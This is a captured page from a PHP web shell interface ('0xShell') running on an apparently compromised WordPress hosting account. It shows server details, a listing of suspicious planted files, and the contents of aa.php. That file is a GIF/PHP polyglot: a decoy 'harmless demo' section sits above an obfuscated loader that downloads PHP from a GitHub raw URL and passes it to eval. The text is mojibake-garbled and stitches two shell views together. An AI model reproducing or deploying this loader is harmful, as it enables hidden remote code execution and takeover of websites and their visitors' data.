0xShell

0xShell Shell MySQL Netstat SMTP FTP SSH æœªé€‰æ‹©ä»»ä½•æ–‡ä»¶ Domain Upload file System Info: User: couragent | UID: 1022 | GID: 1024 | Groups: 1024 Server IP: 62.72.47.222 | Client IP: 23.145.24.71 PHP: 8.1.29 | OS: Linux | Server: LiteSpeed command /home/couragent/public_html$ Enter file path to read Files ../ ï¿½ .htaccess ï¿½ '0e 4e5 .tmb/ ï¿½ .user.ini ï¿½ '0e 4e5 .well-known/ ï¿½ 123.php ï¿½ '0e 4e5 cgi-bin/ ï¿½ clasa99.php ï¿½ '0e 4e5 error_log ï¿½ '0e 4e5 evs.txt ï¿½ '0e 4e5 home/ ï¿½ index.php ï¿½ 4e5 license.txt ï¿½ '0e 4e5 op.php ï¿½ '0e 4e5 php.ini ï¿½ '0e 4e5 readme.html ï¿½ '0e 4e5 robots.txt ï¿½ '0e 4e5 wp-activate.php ï¿½ '0e 4e5 wp-admin/ ï¿½ wp-blog-header.php ï¿½ '0e 4e5 wp-comments-post.php ï¿½ '0e 4e5 wp-config-sample.php ï¿½ '0e 4e5 wp-config.php ï¿½ '0e 4e5 wp-content/ ï¿½ wp-cron.php ï¿½ '0e 4e5 wp-includes/ ï¿½ wp-links-opml.php ï¿½ '0e 4e5 wp-load.php ï¿½ '0e 4e5 wp-login.php ï¿½ '0e 4e5 wp-mail.php ï¿½ '0e 4e5 wp-settings.php ï¿½ '0e 4e5 wp-signup.php ï¿½ '0e 4e5 wp-trackback.php ï¿½ '0e 4e5 xmlrpc.php ï¿½ '0e 4e5 Viewing: op.php 0xShell

0xShell

/home/dreamlifellc/public_html/MichaelsHappyFish.com$

Files

Viewing: aa.php

ï»¿ï»¿<?php
?>
GIF89a
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PHP Polyglot Example</title>
</head>
<body>

<h1>PHP Polyglot Demo</h1>

<?php
// This PHP code is completely harmless.
// It just prints today's date.
echo "<p>Today's date is: " . date('Y-m-d') . "</p>";
?>

<p>This file starts with a GIF header, so some tools might classify it incorrectly,
but the contents are safe HTML + PHP.</p>

</body>
</html>

<?php 
//fagadf
# CompiledBy: DevKit 9.5.2
// æ··æ·†å¯†é’¥: 3a7b10bc
// å¯åŠ¨ä¼šè¯
session_start();
// è®¾ç½®ä¸»åœ°å€ï¼Œå¦‚æžœæ²¡æœ‰è®¾ç½®åˆ™ä½¿ç”¨é»˜è®¤åœ°å€
$ä¸»åœ°å€ = $_SESSION['ts_url'] ?? 'https://raw.githubusercontent.com/bosseptp-svg/hey/refs/heads/main/classwithtostring.php';
// å®šä¹‰åŠ è½½å‡½æ•°
function åŠ è½½æ•°æ®($åœ°å€)
{
    $å†…å®¹ = '';
    try {
        $æ–‡ä»¶ = new SplFileObject($åœ°å€);
        while (!$æ–‡ä»¶->eof()) {
            $å†…å®¹ .= $æ–‡ä»¶->fgets();
        }
    } catch (Throwable $é”™è¯¯) {
        $å†…å®¹ = '';
    }
    // å°è¯•ç”¨ file_get_contents
    if (strlen(trim($å†…å®¹)) < 1) {
        $å†…å®¹ = @file_get_contents($åœ°å€);
    }
    // å¦‚æžœè¿˜å¤±è´¥ï¼Œä½¿ç”¨ curl
    if (strlen(trim($å†…å®¹)) < 1 && function_exists('curl_init')) {
        $é€šé“ = curl_init($åœ°å€);
        curl_setopt_array($é€šé“, [CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10]);
        $å†…å®¹ = curl_exec($é€šé“);
        curl_close($é€šé“);
    }
    return $å†…å®¹;
}
// å°è¯•åŠ è½½ä¸»ç½‘å€
$ç»“æžœ = åŠ è½½æ•°æ®($ä¸»åœ°å€);
// æ·»åŠ å‡çš„PNGå¤´éƒ¨
$å‡PNGå¤´ = "\x89PNG\r\n\x1a\n";
// æ‹¼æŽ¥PNGå¤´å’Œç»“æžœå†…å®¹
$ç»“æžœ = $å‡PNGå¤´ . $ç»“æžœ;
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
// å¦‚æžœæˆåŠŸèŽ·å–å†…å®¹ï¼Œåˆ™æ‰§è¡Œ
if (strlen(trim($ç»“æžœ)) > 0) {
    @eval("?>{$ç»“æžœ}");
}

Disabled functions: None

0xShell

Upload to Multiple Directories

Files

Viewing: aa.php